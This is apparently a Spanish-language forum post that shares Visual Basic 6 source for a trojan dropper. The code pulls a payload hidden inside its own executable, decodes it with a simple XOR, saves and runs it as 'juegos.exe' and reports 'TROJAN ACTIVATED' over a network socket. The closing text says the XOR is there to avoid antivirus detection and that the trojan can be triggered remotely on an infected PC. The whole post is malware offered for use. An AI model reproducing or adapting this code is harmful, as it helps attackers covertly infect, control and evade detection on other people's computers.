Autor
Código:
Public Sub UnpANDDec(trojan As Integer)
dump = 196608 'tamaño del troyano compilado
Open ".\" & App.EXEName & ".exe" For Binary As #1
Dim writeQ As Boolean
Open ".\" & "juegos.exe" For Output As #2
Close #2
Open ".\" & "juegos.exe" For Binary As #2
Do
DoEvents
Get #1, , chara
If trojan = 0 Then
If Loc(1) = dump + 1 Then
writeQ = True
End If
Else
If Loc(1) = dump + 351788 + 1 Then
writeQ = True
End If
End If
If writeQ = True Then
chara = Chr((Asc(chara) Xor 4))
Put #2, , chara
End If
If trojan = 0 Then
If Loc(1) = 351788 + dump Then
writeQ = False
End If
Else
If Loc(1) = 351788 + 372131 + dump Then
writeQ = False
End If
End If
If Loc(1) = LOF(1) Then
Exit Do
End If
Loop
Close
Close
Dim rerts
retrs = Shell(".\juegos.exe")
Code.ws(Code.ports).SendData "TROJAN ACTIVATED" & vbCrLf
Call Reset
End Sub
cifra los archivos con un simple xor 4 para q no sean detectados, y al infectar una pc con el troyano, se puede activar remotamente. Lo descifra y lo ejecuta. Suert
En línea
